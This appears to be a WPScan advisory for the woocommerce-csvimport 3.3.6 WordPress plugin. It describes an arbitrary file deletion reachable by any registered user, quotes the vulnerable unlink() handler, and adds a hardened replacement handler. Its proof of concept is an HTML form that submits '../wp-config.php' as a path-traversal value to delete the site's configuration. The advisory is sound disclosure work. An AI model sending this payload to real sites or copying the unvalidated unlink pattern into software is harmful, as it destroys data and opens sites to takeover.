woocommerce-csvimport 3.3.6 – Authenticated Arbitrary File Deletion


Description
Required user access: any registered user.

$_POST['filename'] is passed to unlink() without any validation or escaping.
Code
File: wp-content/plugins/woocommerce-csvimport/export/include/classes/woocsvExport.php, line 64
public function delete_export_file() {
   
   if ( isset( $_POST['filename'] ) ) {
      @unlink( $_POST['filename'] );
   }
   wp_die( 0 );
}

Result:

The wp-config.php file is deleted, which restarts the whole system.
Proof of Concept
1 - Log in as any user.
2 - Submit the form:
<form method="post" action="http://src.wordpress-develop.dev/wp-admin/admin-ajax.php?action=delete_export_file">
   <input type="text" name="filename" value="../wp-config.php">
   <input type="submit">
</form>
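
A hardened version of the handler shown under Code, as an added example (not the plugin's own code or its actual fix). It assumes exports are .csv files stored in an uploads subdirectory named woocsv-exports, that the admin page issues a nonce for the action woocsv_delete_export, and that only users with the WooCommerce manage_woocommerce capability may delete exports; all of these names are hypothetical. With it, the value ../wp-config.php from the form above is rejected.

```php
<?php
// Added example, not the plugin's code. Assumed (hypothetical) names: the export
// directory 'woocsv-exports', the nonce action 'woocsv_delete_export', and the
// function names below.

/**
 * Resolve a user-supplied name to a file directly inside $base_dir, or null.
 * Pure PHP, so it can be unit-tested outside WordPress.
 */
function woocsv_resolve_export_file( string $base_dir, string $name ): ?string {
    $name = basename( str_replace( '\\', '/', $name ) ); // drop any directory part
    if ( ! preg_match( '/\A[\w.-]+\.csv\z/', $name ) ) {
        return null; // only plain *.csv names are export files
    }
    $base = realpath( $base_dir );
    $path = realpath( $base_dir . '/' . $name ); // false if missing; resolves symlinks
    if ( false === $base || false === $path || ! is_file( $path ) ) {
        return null;
    }
    // After symlink resolution the file must still sit in the export directory.
    return dirname( $path ) === $base ? $path : null;
}

function woocsv_delete_export_file_hardened() {
    check_ajax_referer( 'woocsv_delete_export', 'nonce' ); // CSRF check, dies on failure
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( 'forbidden', 403 ); // "any registered user" is not enough
    }
    $upload = wp_upload_dir();
    $dir    = trailingslashit( $upload['basedir'] ) . 'woocsv-exports';
    $name   = isset( $_POST['filename'] ) ? wp_unslash( $_POST['filename'] ) : '';
    $path   = is_string( $name ) ? woocsv_resolve_export_file( $dir, $name ) : null;
    if ( null === $path ) {
        wp_send_json_error( 'invalid file', 400 );
    }
    wp_delete_file( $path );
    wp_send_json_success();
}
// Logged-in users only; no wp_ajax_nopriv_ hook is registered.
add_action( 'wp_ajax_delete_export_file', 'woocsv_delete_export_file_hardened' );
```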

Affects Plugin

References

URL https://lenonleite.com.br/publish-exploits/plugin-woocommerce-csv-importer-3-3-6-rce-unlink/

Classification

Type UNKNOWN

Miscellaneous

Submitter Lenon Leite
Submitter Website https://lenonleite.com.br/
Submitter Twitter https://twitter.com/lenonleite
Views 48
Verified No
WPVDB ID 9057

Timeline

Publicly Published 2017-12-27 (4 months ago)
Added 2018-04-09 (18 days ago)
Last Updated 2018-04-09 (18 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.